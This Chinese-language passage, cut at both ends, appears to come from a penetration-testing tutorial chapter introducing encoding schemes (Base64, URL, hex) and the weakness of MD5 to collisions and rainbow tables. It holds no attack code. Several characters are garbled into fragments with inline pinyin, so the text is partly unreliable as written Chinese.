hí)。本章將介紹常見加密算法,幫助你在滲透測(cè)試和安全防護(hù)中正確使用加密技術(shù)。常見加密算法解析編碼算法Base64:將二進(jìn)制數(shù)據(jù)編碼為ASCII字符,常用于數(shù)據(jù)傳輸。Base64不是加密,可直接解碼,等號(hào)填充是特征。URL編碼:將特殊字符轉(zhuǎn)換為%xx格式,用于URL參數(shù)傳遞。Hex編碼:將字節(jié)轉(zhuǎn)為十六進(jìn)制表示,如0x41代表字母A。哈希算法MD5:生成128位(32字符)哈希值,已被碰撞攻擊破解,不應(yīng)用于安全場(chǎng)景。彩虹表可快速破解弱密碼MD5。S